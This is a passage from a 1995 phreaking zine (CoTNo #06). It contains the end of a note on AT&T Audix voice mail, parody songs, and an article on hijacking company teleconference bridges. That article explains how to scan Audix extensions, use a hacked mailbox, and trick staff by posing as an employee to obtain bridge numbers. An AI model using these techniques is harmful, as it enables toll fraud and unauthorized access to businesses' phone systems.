  3281. of multiple fragments. A fragment can be a single word, a complete sentence,
  3282. or a bunch of sentences. For example, "Please enter extension and pound sign"
  3283. is most likely to be two fragments. The first being "please enter extension"
  3284. and the second being "and pound sign". Obviously, this is used to save space.
  3285. A second recording is: "Enter password and pound sign", the "and pound sign"
  3286. is the same fragment as in the first one. Since AT&T sells it's Audix system
  3287. in nearly 80 countries, there are a couple of different language tapes also.
  3288. So don't be surprised if you encounter a Spanish or Japanese Audix VMS.
  3289. Currently AT&T offers ten language tapes and the Definity Audix can support
  3290. up to nine different language tapes simultaneously.
  3291.  
  3292.  
  3293. "So if it's an Audix voice mail then there's a Definity PBX, right? "
  3294.  
  3295. Wrong. Even though it fits the Definity PBX like a glove, it can be integrated
  3296. with other switches. Some of the most common are:
  3297.  
  3298.         - G3I        - System 25
  3299.         - G3S        - System 75
  3300.         - G3R        - System 85
  3301.  
  3302. I'm not sure about NorTel switches such as the SL-1, some people say yes, 
  3303. while others say that only AT&T switches can be integrated with Audix. If 
  3304. anyone knows, please let me know. Comments or suggestions are welcome.
  3305.  
  3306.  
  3307.                               -  Boba Fett
  3308.  
  3309. <EOF>
  3310. <05/23/95>
  3311.  
  3312.  
  3313. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>                                 
  3314.  
  3315.  
  3316.  
  3317.                                       /\                                
  3318.                                       \/
  3319.                                Bridging the Gap
  3320.                         /\-------------------------/\       
  3321.                         \/-------------------------\/
  3322.                                 Eddie Van Halen   
  3323.                                       /\
  3324.                                       \/
  3325.  
  3326.  
  3327. INTRODUCTION
  3328. ------------
  3329. First of all I wrote this because for one thing I am SICK AND TIRED of sitting 
  3330. on irc and seeing "k0nPhiNf0!?" pumped through my terminal every five seconds.  
  3331. Then,once they get the k0nPh iNf0, I am forced to constantly hear from the 
  3332. k0nPh people about how "DiZ k0nPh sUx!". People give me k0nPh info all the 
  3333. time but I NEVER call into them.  Why?  Because these days,they DO suck.  It 
  3334. seems the underground world have completely forgotten about what use to be 
  3335. the best way to conference - BRIDGE's.  
  3336.    
  3337.  
  3338. ABOUT BRIDGES
  3339. -------------
  3340. I'm sure everyone reading this knows what a bridge is.  Whether they know the 
  3341. best way to get them is another thing.  I do, however, run across the
  3342. occasional irc'er that /msgs me with "whats a bridge?" when I bring up the 
  3343. subject.
  3344.  
  3345. Bridges are just about the same as k0nPhz, except they are usually owned and 
  3346. used by big businesses and schools on their own telephone equipment.  This
  3347. equipment is usually integrated into their voice mail and/or PBX computers 
  3348. and allows the company or school to hold teleconferences without relying on
  3349. the national teleconference providers.
  3350.  
  3351. For those out there (if any?) that remember the 904-348 bridge,  it was a 
  3352. System 75 PBX bridge used by a home school, where the students would call in 
  3353. in the daytime and take tests and attend classes.  The way it was used was as 
  3354. follows:
  3355.             
  3356.         You would dial 348-XX00 to 348-XX19.  That was ONE of the bridges.  
  3357.         Anybody that connected to any number from 00 to 19 would be connected
  3358.         to the bridge.  If two people tried to connect to the same number, it 
  3359.         would be busy. Thus, it had 20 lines.  A second bridge was reached at 
  3360.         348-XX20 to 348-XX29. This was off the same system, but gave you a 
  3361.         different bridge with 10 lines.  Yet another bridge could be found at
  3362.         348-XX30 to 348-XX69 off the same system.
  3363.  
  3364. You could call in during the daytime and mess with the teachers and kids or 
  3365. whatever, but occasionally they would hang you up, or call you back or
  3366. something.  This one went down because it wasn't blocked from collect calls,
  3367. and the number got very widespread throughout the k0d3lyN3 and BBS world and 
  3368. was constantly collect-called by lamers who didn't know how to phreak.  It is,
  3369. however, occasionally up for the students to use, but goes down as soon class 
  3370. is over.
  3371.  
  3372. FINDING A BRIDGE.
  3373. -----------------
  3374. Finding a bridge use to be the easiest thing for me.  It used to be, like,
  3375. WHAT I DID.  I would put one up on my codeline, and spread it to the others,
  3376. and would call into QSD or Lutz or something about 30 minutes afterward
  3377. and get messages from people who I didn't even know saying "Hey,man,thanx
  3378. for puttin up that bridge!".  These days I don't even bother.  I don't WANT
  3379. to talk to half these idiots that are around today.
  3380.  
  3381. Anyway, lets say you want to find a bridge.  Go through the phonebook and look
  3382. up the all the big businesses.  Call the main numbers that you find after
  3383. hours and find out which ones have voice mail systems.  In this article, I 
  3384. will focus on the Audix voicemail system made by AT&T so look for those.  To
  3385. tell if your target is using Audix, press *8 during the greet, and if it says 
  3386. "Enter the four digit extension and pound sign." you have found one.  A 
  3387. complete guide to hacking Audix voice mail can be found in CoTNo #1, 
  3388. article #1.  Railroad companies like CSX and AT&T owned companies like 
  3389. Transtech, or Card Services often have Audix systems with bridges.
  3390.  
  3391. Once you have the targeted Audix system,you need to start scanning for the
  3392. system extensions.  Hit *6 for the names directory and try entering 
  3393. CONFERENCE, BRIDGE, or TELE.  You COULD possibly get the actual extension to
  3394. the bridge spit out right at you (as with CSX's system),or at least most
  3395. systems have that extension where you hear the person state their name
  3396. "Conference Planning".  If this is the case,you need to get a voice mail
  3397. box off the system and send a message to whatever extension Conference
  3398. Planning is saying something like "Yes, I need a conference set up for
  3399. such and such a date & such and such a time".  This will more than likely
  3400. work and Conference Planning will respond usually with either "No problem,
  3401. the teleconference bridge is at XXXX" or "All we need is the PIN
  3402. number you want."
  3403.  
  3404. However, a lot of systems do not have their *6 directory system configured
  3405. very good at all, so you might want to try scanning all the XX00 and XX99
  3406. and find out where all the computer-related extensions are located at.
  3407. Or you might want to social engineer it out of one of the people located
  3408. at an extension.  Try calling from within your box and acting like you work
  3409. there.
  3410.  
  3411. Once you have found what you think is the bridge,you need to test it out
  3412. with a friend.  If he calls into the same extension and gets a busy signal,
  3413. you may want tell him to try the next extension up.  If the bridge is
  3414. multi-lined, have him figure out how many lines the bridge has and make 
  3415. sure the lines are all going to the same bridge and not 3 different 
  3416. bridges or something.  Note that if you are scanning on a Railroad 
  3417. companies system, you will sometimes come to an extension you might think
  3418. is a bridge and end up to be dispatchers.  So once you sign on to what you
  3419. believe is the bridge,hit a few dtmf tones and make sure you don't hear
  3420. someone say "You done hittin funny buttons!!!" or "dispatcher,mike."
  3421.  
  3422. SECURITY ON A BRIDGE.
  3423. ---------------------
  3424. Security on a bridge is a lot different than on an alliance or on a k0nPh.
  3425. You usually don't have to worry about it getting cancelled and the bridge
  3426. usually will not ever go down if you don't third-party or collect call to
  3427. it.  You are not dealing with the phone company here, you are dealing
  3428. with whatever business owns it, and if they detect a lot of activity on
  3429. the extension, they will usually either warn you to leave by recording the
  3430. conversations and playing them back to you, or just change the extension.
  3431. DO expect to be dealing with the business communication security person,
  3432. though, at one time or another.  They will usually talk to you and explain to
  3433. you why they need you to leave, and most of the time I found out, it wasn't
  3434. because of the people using their bridge, it was because of the collect-
  3435. calling, third party billing or the fact that people were using it via the
  3436. 800 number and the company was having to pick up the tab.  I don't recommend
  3437. finding a bridge and giving it to the entire world because when you are
  3438. not on, you don't know what goes on in the conversation, and if the company
  3439. does finally decide to get it investigated, the investigators seem to go
  3440. after the same thing every time: the source that gave out the bridge in
  3441. the first place.
  3442.  
  3443. CONCLUSION
  3444. ----------
  3445. Hopefully you have learned something from all this.  With a little time and
  3446. patience, you can set up a bridge that will last for weeks, maybe months.
  3447. And besides, hacking out a phone system will teach you a lot more than
  3448. than setting up a k0nPh off your neighbor's phone terminal.  So next time
  3449. you see someone flash "k0nPhiNf0!?", tell them to get off there ass and
  3450. try hacking one out for a change.
  3451.  
  3452.  
  3453. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>    
  3454.  
  3455.  
  3456.  
  3457.                            Elite Music Part V 
  3458.                            - Disk Jockey/WR -
  3459.  
  3460.  
  3461. Please note the /WR. Until now I have not been in textfiles at large, only
  3462. a few given to good friends. There have been other `DJ's out there; as many
  3463. as six by my count, so far. So even that my group has had but one member
  3464. for over four years, I keep the tag to distinguish myself.
  3465.  
  3466. Well, while on a (pretty lame, I must admit) conference with a barrage of
  3467. lame people, sending streams of DTMF tones, long belches, humming, and
  3468. music down the line, I got an idea. At one point the B-52's `Roam' was
  3469. played in the background during a half-intelligent discussion of cellular
  3470. telecommunications. These lyrics almost came to me almost immediately, and
  3471. these are the results. I intend to record this song for real in a few
  3472. months or so; I do have the instrumental of the real song and it would be
  3473. somewhat fun to do. Maybe a .AU will be out there on the Web, sometime...
  3474. and by that time these lame people might grow up. (But, I can't ask for
  3475. everything.)
  3476.  
  3477.   "Phone Roam"
  3478.  
  3479.   Roam cyberspace, switching through every carrier
  3480.   Oh girl won't you lend me one of those codes
  3481.   Take it trunk to trunk, hopping through the satellites
  3482.   Around the world, the call flags switchboard lights
  3483.  
  3484.   Roam if you want to, roam around the world
  3485.   Roam if you want to, without codes, without cards
  3486.   Roam if you want to, roam around the world
  3487.   Roam if you want to, without anything but an ESN
  3488.  
  3489.   Hit conferences where you'll lose your mind
  3490.   Toners and lamers, leave them all behind
  3491.   Take it trunk to trunk, hopping through the satellites
  3492.   Around the world, the call flags switchboard lights
  3493.  
  3494.   Roam if you want to, roam around the world
  3495.   Roam if you want to, without codes, without cards
  3496.   Roam if you want to, roam around the world
  3497.   Roam if you want to, without anything but an ESN
  3498.  
  3499.   Go ahead and roam, go ahead and roam
  3500.  
  3501.   Scan all you can while the Feds trace you
  3502.   Hack up PBXs till your hands get tired
  3503.   Take it trunk to trunk, hopping through the satellites
  3504.   Around the world, the call flags switchboard lights
  3505.  
  3506.   Roam if you want to, roam around the world
  3507.   Roam if you want to, without codes, without cards
  3508.   Roam if you want to, roam around the world
  3509.   Roam if you want to, without anything but an ESN
  3510.  
  3511.   Take it trunk to trunk, hopping through the satellites
  3512.   Take it trunk to trunk, hopping through the satellites
  3513.   Take it trunk to trunk, hopping through the satellites
  3514.   Take it trunk to trunk, hopping through the satellites
  3515.   Take it trunk to trunk, hopping through the satellites
  3516.   Take it trunk to trunk, hopping through the satellites
  3517.   Go ahead and roam, go ahead and roam
  3518.  
  3519.  
  3520. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
  3521.  
  3522. End of CoTNo #06
  3523.  
  3524. I know you expect some snappy ending as usual to another successful issue
  3525. of Communications of The New Order, but considering the grimness of much
  3526. of this issue I don't think it would be appropriate.  Despite all of the
  3527. bad news that was presented in this issue, I hope that everyone will 
  3528. "keep the faith", as it were.  Explore, learn, educate.  But don't do
  3529. anything stupid.  The powers that be are becoming increasingly intent
  3530. upon stopping those who are labeled as "hackers".  And everyday, there
  3531. are more of us for them to stop.  Everyday, we are being introduced to
  3532. new technologies that few people understand, and few people want to 
  3533. understand.  Our desire to understand can be achieved, but we must be
  3534. careful.  
  3535.  
  3536. Even though you just read this issue's Elite Music, I thought I would 
  3537. finish off with another song that has special significance to me.  This 
  3538. showed up in my e-mail the other day and it really made me think.  I 
  3539. hope it is as meaningful to you as it was for me...
  3540.  
  3541.  
  3542. TNO MAN 
  3543. -------
  3544. To the Tune of Desperado, by The Eagles
  3545.  
  3546.  
  3547. TNO man, why don't you come to your senses?
  3548. You been out jumping' fences into those Bell yards.
  3549. Oh you're a smart one, I know that you got your reasons,
  3550. these things that are pleasin' can hurt you somehow.
  3551.  
  3552.    Don't you hack on those old .mil sites,
  3553.    they'll catch you if you're lazy,
  3554.    you know diverting twice is always your best bet.
  3555.    Now it seems to me some eleet things
  3556.    have been shown upon your screen
  3557.    but you only want the ones that you can't hack.
  3558.  
  3559. TNO man, oh you ain't gettin' no younger,
  3560. your hunger for knowledge, it's drivin' you on.
  3561. And hacking, oh hacking, well that's just some people talkin',
  3562. your prison is waitin' at the end of the line.
  3563.  
  3564.    Don't your power get old on the Internet?
  3565.    The account won't die and the root won't mind,
  3566.    it's hard to tell the night time from the day.
  3567.    You're losin' all your highs and lows,
  3568.    ain't it funny how the feelin' goes away?
  3569.  
  3570. TNO man, why don't you come to your senses?
  3571. Come down from your firewalls, open the gateway.
  3572. It may be laming' but there's a job waiting for you.
  3573. You better let somebody hire you LET SOMEBODY HIRE YOU
  3574. you better let somebody hire you before it's too late.
  3575.  
  3576.        - Don Henley, Glenn Frey and the Voyager
  3577.  
  3578.